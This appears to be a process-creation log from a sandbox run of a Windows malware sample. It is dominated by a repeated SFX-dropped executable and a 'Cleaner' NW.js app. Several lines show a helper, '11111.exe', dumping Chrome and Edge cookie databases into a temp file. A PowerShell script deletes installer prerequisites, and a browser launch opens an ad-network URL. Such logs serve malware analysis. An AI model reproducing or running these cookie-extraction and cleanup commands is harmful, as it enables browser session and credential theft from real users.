C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_C869.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1bc,0x210,0x7fff033edec0,0x7fff033eded0,0x7fff033edee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6b83d9e70,0x7ff6b83d9e80,0x7ff6b83d9e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=1852 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=2440 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2572 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2564 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=3284 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=3860 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=3920 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=2120 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=840 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
